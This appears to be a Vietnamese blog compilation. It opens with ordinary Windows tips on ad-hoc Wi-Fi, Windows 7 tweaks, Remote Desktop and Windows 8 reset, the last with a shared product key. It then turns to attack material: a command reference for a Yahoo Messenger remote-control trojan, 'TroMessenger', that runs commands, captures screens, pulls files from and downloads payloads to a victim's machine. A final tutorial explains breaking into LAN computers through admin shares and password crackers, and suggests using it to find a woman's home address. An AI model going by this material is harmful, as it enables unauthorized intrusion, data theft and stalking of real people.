Cài đặt cho máy thứ nhất trở thành điểm truy cập mạng (Access Points)

Nhấn đúp vào biểu tượng (Icon) mạng nằm ở khay hệ thống (System Tray, góc dưới bên phải màn hình), sẽ xuất hiện lên bảng danh sách các mạng không dây, chọn Change the order of preferred networks.


Trong Wireless Networks nhấn vào nút Add.


Trong Association, đặt tên cho mạng trong mục Network name.
Chọn The key is provided for me automatically.
Chọn This is a computer-to-computer(adhoc) network; wireless access points are not used.
Nhấn Ok để quay lại bảng Wireless Networks và nhấn Ok một lần nữa để kết thúc quá trình tạo Access Point trên máy thứ nhất.



Kết nối máy tính vào Access Points

Cũng vẫn trên máy tính thứ nhất, bạn hãy nhấn đúp chuột vào biểu tượng (Icon) mạng nằm ở khay hệ thống (System Tray, góc dưới bên phải màn hình), sẽ xuất hiện lên bảng danh sách các mạng không dây. Lúc này bạn sẽ thấy tên của mạng mà bạn vừa mới tạo, nếu không thấy bạn hãy nhấn vào nút Refresh network list.
Chọn mạng và nhấn Connect.


Xuất hiện bảng thông báo nhập Network key (đây là mã số bảo vệ mạng, ngăn không cho máy khác kết nối vào mạng của bạn), bạn hãy nhập vài số bất kỳ (thí dụ: 123456) vào cả 2 mục, nhấn Connect. Kết nối mạng của máy sẽ chuyển sang trạng thái chờ đợi để máy khác kết nối vào.


Chuyển qua máy tính thứ 2, nhấn đúp vào biểu tượng (Icon) mạng nằm ở khay hệ thống (System Tray, góc dưới bên phải màn hình), sẽ xuất hiện lên bảng danh sách các mạng không dây. Lúc này bạn sẽ thấy tên của mạng mà bạn vừa mới tạo trên máy thứ 1, nếu không thấy bạn hãy nhấn vào nút Refresh network list.
Chọn mạng và nhấn Connect, sẽ xuất hiện bảng thông báo nhập mã số (Network key), bạn hãy nhập số giống như trên máy thứ 1 (thí dụ: 123456) vào cả 2 mục và nhấn Connect.
Lúc này kết nối mạng của 2 máy sẽ chuyển sang trạng thái thiết lập thông số để kết nối. Lưu ý ở bước này, nếu cả hai máy đều đã được thiết lập địa chỉ IP thì sẽ kết nối rất nhanh, còn nếu thiết lập ở chế độ Auto (mặc định) thì sẽ mất khoảng một vài phút, cách này tuy chậm nhưng sẽ đảm bảo là máy của bạn có thể kết nối được với các mạng khác nhau.


Sau cùng cả 2 máy đều báo Connected, bạn có thể đóng bảng Wireless Network Connection này lại, bây giờ 2 máy đã kết nối với nhau và đã sẵn sàng cho việc chia sẻ (Share) dữ liệu. Xem hướng dẫn cách chia sẻ tài nguyên trên hệ thống mạng.
http://www.buaxua.vn | Xem thêm tại: http://www.buaxua.vn/Mang-Internet/Ket-noi-2-may-Laptop-voi-nhau-bang-Wireless.html

Thứ Năm, 19 tháng 1, 2012

4 kinh nghiệm trong Windows 7 có thể bạn chưa biết

4 kinh nghiệm trong Windows 7 có thể bạn chưa biết
Cập nhật lúc 07h20' ngày 09/11/2011 Bản in
Chia sẻ

Quản Trị Mạng - Đối với người dùng Windows 7 thông thường, hầu hết sẽ chấp nhận các thiết lập mặc định của hệ thống và không thay đổi quá nhiều thiết lập bên trong. Lý do là bởi nhằm giảm thiểu nguy cơ làm hỏng hệ điều hành. Tuy nhiên, một số người lại thích thú với việc khám phá, tinh chỉnh lại các thiết lập với mục đích làm cho công việc của mình nhanh hơn, hiệu quả hơn. Dưới đây là 4 kinh nghiệm trong việc sử dụng Windows 7 sẽ giúp tăng hiệu suất hoạt động của máy tính.
1. Giảm thời gian hiển thị của thumbnail trong Taskbar

Đôi khi việc xem trước trạng thái hiện tại của một chương trình mà không cần chuyển sang nó thật sự tiện lợi. Windows 7 cung cấp tính năng nhỏ được gọi là thumbnail, nhờ đó mỗi khi người dùng di chuyển chuột qua một tab chương trình trong taskbar, thumbnail của nó sẽ hiển thị. Tuy nhiên bạn có thể phải chờ khá lâu để thấy được thumbnail. Thủ thuật sau đây sẽ giúp bạn cải thiện tình trạng này.
Lưu ý: tạo điểm khôi phục trước khi tiến hành chỉnh sửa bất kỳ điều gì trong registry!
Trước tiên bạn kích Start và nhập vào regedit trong hộp search. Nhấn Enter.
Duyệt tới HKEY_CURRENT_USER\Control Panel\Mouse.

Kích đúp chuột vào khóa MouseHoverTime. Giá trị mặc định là 400, bạn có thể thay đổi thành 150 (thời gian được tính bằng miligiây) để giảm thời gian hiển thị thumbnail. Kích OK để lưu thay đổi và thoát khỏi trình soạn thảo registry. Sau đó khởi động lại máy tính để cảm nhận sự khác biệt.

2. Ngăn chặn việc ngốn bộ nhớ của Windows 7

Windows luôn sử dụng bộ nhớ RAM để lưu trữ toàn bộ thành phần của các chương trình máy tính, dịch vụ và thư viện đang chạy. Ngoài ra, RAM còn lưu trữ mọi chương trình nào mà nó nghĩ rằng bạn có thể sử dụng. Tính năng này được biết đến với tên SuperFetch. SuperFetch hiểu những ứng dụng bạn hay sử dụng và tải trước vào trong bộ nhớ, do đó hệ thống của bạn sẽ phản ứng lại nhanh hơn. SuperFetch dùng phối hợp mức ưu tiên thông minh để hiểu những ứng dụng nào bạn hay sử dụng. Ví dụ những việc cuối tuần khác với những việc hàng ngày, do đó máy tính của bạn sẽ sẵn sàng làm với những gì mà bạn muốn. Windows 7 có thể cũng ưu tiên những ứng dụng của bạn hơn là những chương trình chạy phía sau (Background), do đó khi bạn quay trở lại, máy tính sẽ rời trạng thái nghỉ và ngay lập tức bắt đầu làm việc. Tuy nhiên nhiều người dùng đã phàn nàn về vấn đề tốn bộ nhớ của Windows 7, đối với những hệ thống có bộ nhớ RAM thấp có thể giảm thiểu tình trạng này bằng cách vô hiệu hóa Superfetch:
Kích Start > Control Panel. Ở chế độ hiển thị mặc định bạn chọn “System and Security” (trong Windows Vista là “System and Maintenance”).

Kích chọn “Administrative Tools”.

Tại đây bạn kích “Services” để mở cửa sổ dịch vụ Services. Duyệt đến dòng có tên Superfetch > chuột phải chọn Properties:

(Hoặc bạn có thể vào trực tiếp cửa sổ Services bằng cách nhập services.msc vào hộp search của menu Start).
Trong Properties, mục Startip type mặc định là Automatic, bạn kích vào đó và đổi thành Disabled. Kích nút Stop bên dưới và chờ một chút để ứng dụng bị vô hiệu hóa. Sau đó kích OK.
Bằng cách vô hiệu hóa Superfetch máy tính của bạn sẽ “dễ thở” hơn. Có thể cần khởi động lại để có hiệu quả. Tuy nhiên, việc máy tính sử dụng nhiều bộ nhớ còn có nhiều nguyên nhân khác như virus, chạy chương trình làm rò rỉ bộ nhớ... Vì vậy bạn cần giám sát việc sử dụng tài nguyên thường xuyên bằng công cụ task manager (Ctrl+Shift+Esc).
3. Thêm chương trình vào Startup nhanh chóng

Với những chương trình hàng ngày bạn cần sử dụng, việc cho phép chúng tự khởi động cùng Windows mặc dù có thể gây chậm hệ thống lúc mới bắt đầu, nhưng cũng rất tiện lợi bởi người dùng không cần mở từng chương trình một. Chỉ cần khởi động Windows và chờ một chút và toàn bộ những thứ cần thiết sẽ xuất hiện và sẵn sàng để sử dụng.
Tất cả những gì bạn cần làm là thêm các shortcut vào thư mục Startup trong All Programs của menu Start (nếu không thấy thư mục này bạn có thể thêm vào theo hướng dẫn tại đây).
Kích và giữ chuột tại shortcut của chương trình cần thêm vào, di chuyển vào biểu tượng menu Start:

Sau đó (vẫn giữ chuột) rê chuột tới thư mục Startup vào chèn vào trong:

Hoặc bạn có thể vào Start > All Programs > chuột phải vào thư mục Startup > Open. Sau đó thêm các shortcut vào cửa sổ vừa mở.
4. Ẩn tùy chọn Update không cần thiết trong Windows

Các bản cập nhật mới nhất thường chứa những bản vá bảo mật hay bổ sung tính năng mới giúp máy tính tránh các lỗ hổng và chạy ổn định hơn. Tuy nhiên không phải bản vá nào cũng cần thiết đối với mọi người dùng, chẳng hạn như các gói ngôn ngữ... Nếu không muốn cập nhật những chương trình này bạn có thể ẩn chúng đi, và chỉ để lại những phần quan trọng.
Đầu tiên mở cửa sổ Windows Update, kích vào liên kết các bản cập nhật tìm thấy:

Chọn những phần muốn ẩn, kích chuột phải và chọn Hide Updates:

Sau đó những phần này sẽ bị mờ đi và bạn có thể tiến hành cập nhật những bản vá quan trọng khác.
Nếu muốn khôi phục lại những bản đã bỏ qua này, vào Start >> All Programs >> Windows Update. Chọn Restore Hidden Updates từ menu bên trái:

Chọn các mục cần thiết và kích Restore, sau đó chúng sẽ được thêm vào danh sách bản cập nhật và bạn có thể tiến hành cài đặt như bình thường:

Thiết lập và kết nối Remote Desktop trong Windows 7

Thiết lập và kết nối Remote Desktop trong Windows 7
Cập nhật lúc 15h28' ngày 05/01/2012 Bản in
Chia sẻ

Quản Trị Mạng - Tính năng Remote Desktop Manager của Microsoft trong Windows 7 có thể dễ dàng cho phép người dùng kết nối từ máy này tới máy khác trong cùng 1 hệ thống mạng, và chia sẻ tài liệu, văn bản... Trong bài viết dưới đây, chúng tôi sẽ giới thiệu với các bạn một vài bước cơ bản trong quá trình thiết lập và sử dụng tính năng này trong Windows 7.
Trước tiên, các bạn chọn Start > Control Panel > User Accounts > System & Security:

Trong mục System, chọn tab Allow Remote Access như hình dưới:

Khi đã kích hoạt tính năng Remote Desktop thì chúng ta sẽ có 2 tùy chọn:
- Chọn Allow connections from computers running any version of Remote Desktop và nhấn Apply, phù hợp với trường hợp bạn có nhiều Remote Desktop đã được kích hoạt.
- Còn nếu chỉ có 1 phiên bản Remote Desktop duy nhất đang hoạt động thì chọn Allow connections only from computers running Remote Desktop with Network Level Authentication.

Rồi nhấn tiếp Select Users và Add:

Tiếp theo, chọn tài khoản người dùng được phép kết nối tới Remote Manager bằng cách nhấn Advanced > Find Now, danh sách dưới dạng drop down sẽ hiển thị để lựa chọn, bao gồm tài khoản người dùng, tên máy tính hoặc domain. Sau khi chọn, các bạn nhấn OK:

Nhấn tiếp OK 3 lần để áp dụng sự thay đổi và thoát khỏi toàn bộ các cửa sổ, sau đó chuyển sang bước tiếp theo. Nếu muốn bỏ quyền truy cập Remote Desktop với những tài khoản nào đó thì thực hiện tương tự như trên, nhưng lần này chúng ta nhấn Remove.
Đối với những máy tính khác khi muốn kết nối tới thì họ phải có quyền cho phép truy cập. Và để thiết lập, các bạn mở Start > Control Panel > System > Advanced System Settings, chọn tiếp thẻ Remote và đánh dấu vào ô Allow Remote Assistance connections to this computer. Ở phía cuối cửa sổ, chọn tiếp Allow connections from computers running any version of Remote Desktop và cuối cùng, nhấn nút Advance để mở cửa sổ khác, tại đây chúng ta sẽ chọn Allow this computer to be controlled remotely như hình dưới và nhấn OK:

Tuy nhiên, trước khi có thể kết nối tới máy tính Remote thì các bạn cần phải cấu hình và thay đổi thông tin kỹ thuật của Router và hệ thống Firewall trong hệ điều hành:
- Kết nối qua router tới 1 máy tính duy nhất thì cần phải thay đổi chức năng Port Forwarding để cho phép các cổng kết nối trên 3389, sau đó nhập địa chỉ IP được cung cấp bởi ISP.
- Kết nối tới nhiều máy tính khác nhau qua router, đối với mỗi máy tính muốn kết nối tới thì các bạn cần thiết lập số Port khác nhau để tránh trường hợp xung đột.
- Nếu có Firewall thì chúng ta sẽ phải thay đổi lại để cho phép tín hiệu kết nối tới cổng đang được mở trên Router.
Khi đã hoàn tất các bước thiết lập trên, việc còn lại của chúng ta chỉ là sử dụng tiện ích Remote Desktop Connection trong Windows (mở Start và gõ remote để tìm kiếm), cửa sổ như hình dưới sẽ hiển thị:

Nhập tên máy tính, địa chỉ IP hoặc domain cần kết nối, nhấn Connect và nhập các thông tin cần thiết tại cửa sổ hiển thị tiếp theo. Chúc các bạn thành công!

Thứ Tư, 18 tháng 1, 2012

Hướng dẫn Khôi phục cài đặt gốc trong Windows 8

Hướng dẫn Khôi phục cài đặt gốc trong Windows 8
Một chức năng mới mẻ mang tính đột phá trong phiên bản mới WIndows8 sẽ mang đến cho bạn sự dễ dàng trong việc muốn khôi phục lại bản cài đặt gốc. Khi bạn đã sử dụng Windows trong một thời gian dài với nhiều lần cài đặt phần mềm hay gỡ bỏ chúng dẫn đến 'rác' trong hệ thống, 'rác' trong Registry, 'rác' trong các Folder cá nhân của User Profiles, máy bắt đầu bị 'khùng khùng' chậm chạp ... Rất nhiều vấn đề xảy ra khiến bạn muốn dẹp bỏ nó đi nhưng những phần mềm 'đầu tay' cỡ như Tuneup, CCleaner không thể nào dọn dẹp sạch sẽ được, và bạn chỉ muốn "Cánh cửa" của mình quay về thời điểm đầu tiên giống như lúc vừa cài máy mà không muốn cài đặt lại Windows

Tới đây thì 99% người từng sử dụng 'Cánh cửa' của Microsoft sẽ nghĩ tới việc: Cài lại máy, bung file Ghost lúc vừa cài xong hay dùng chức năng Windows Restore? Điều đó không cần thiết với Windows 8, với chức năng "Refresh or Reset Your PC" có sẵn cho phép người dùng có thể khôi phục lại tình trạng mặc định của máy như lúc vừa cài Windows xong :)

Cách thực hiện:
Đầu tiên vào Control Panel trong MetroUI



Bên khung Menu kéo xuống chọn thẻ General


Trong cửa sổ General, khung chức năng bên phải kéo xuống dưới có 2 chức năng là Refresh Your PC và Reset Your PC. Mô tả 2 chức năng này như sau:
- Refresh You PC: Tự động kiểm tra các tập tin hệ thống, Windows Registry và những thành phần quan trọng liên quan với hệ thống, xem xét chúng có hoạt động tốt hay không và tiến hành sửa lỗi. Quá trình Refresh này sẽ không xóa dữ liệu của người dùng, những thiết lập trên Users, những thư mục Document sẽ không bị mất
- Reset Your PC: Chức năng này sẽ tiến hành 'càn quét' toàn bộ hệ thống, đúng như tên gọi tất cả dữ liệu người dùng, các thiết lập Userss, các thư mục lưu trữ của Users sẽ bị 'làm cỏ' tận gốc và quay trở về thời kỳ 'cánh cửa' ban đầu khi mới cài Windows xong

Hình ảnh về 2 chức năng Refresh và Reset

Refresh


Reset


Sau khi nhấn Next thì hệ thống sẽ tự làm việc, và sau khi Reset PC về cài đặt gốc sẽ xuất hiện 1 cửa sổ yêu cầu điền vào Product Key.


bạn sẽ thắc mắc đây là bản Develop Preview sao lại yêu cầu Product Key? Bạn có thể nhấn Skip để bỏ qua hoặc điền vào Key sau:
6RH4V-HNTWC-JQKG8-RFR3R-36498 (Key này mình lấy từ Topic này: I’m reinstalling Windows Developer Preview and need to enter a product key.)

Như vậy 2 chức năng trên đã đủ làm hài lòng bạn chưa? Mình nghĩ việc này thoải mái hơn việc ngồi cài lại máy hay bung GHOST đối với những phiên bản 'Cửa sổ' thế hệ trước


Nếu copy vui lòng ghi nguồn từ Binhphuoc

Chủ Nhật, 15 tháng 1, 2012

Các lệnh trong dos

Các lệnh trong dos
02/07/2009 21:36 | 587 lượt xem
Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v … đều có thể được sử dụng như lệnh DOS.
Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS

Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server … v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính

Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername - cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername - cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.

Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.

Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?
Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.

Câu lệnh: /download “http://www.hostname.com/folder/file.zip” “C:\SavedFile.zip”

Chú ý: Bạn phải sử dụng dấu ngoặc (”). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.

Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn … ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.

Câu lệnh ví dụ :

/status Toiyeuem.

/idle Dangantoi.

/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu…

xâm nhập máy tinh tong mang lan

xâm nhập máy tinh tong mang lan


Xâm nhập máy tính đang Online là một kỹ thuật vừa dễ lại vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách
đáng kể và những máy họ không share thì không thể xâm nhập được, do đó
nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một
cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân
không share là dùng chương trình DOS để tấn công .

Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .
--->>Các bước thực hiện:

(1). Vào Start ==> Run gõ lệnh cmd .
(2). Trong cửa sổ DOS hãy đánh lệnh “net view

+ VD : c:\net view 203.162.30.xx


(3). Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh
tiếp lệnh

net use <ổ đĩa bất kỳ trên máy của bạn> : <ổ share của
nạn nhân>

+ VD : c:\net use E : 203.162.30.xxC

(4). Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy
download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 .
(5). Nếu máy của nạn nhân không có share thì ta đánh lệnh :

net use <ổ đĩa bất kỳ trên máy của bạn> : c$ (hoặc
d$)"administrator"

+ VD : net use E : 203.162.30.xxC$"administrator"

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là
"administrator" .
(6). Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình
“thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ
của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi
tìm được địa chỉ đó ) . Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh :

c:\netstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass
với cô ta thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP
của cô ta . Sau đó bạn dùng cách xâm nhập mà tôi đã nói ở trên , chúc vui !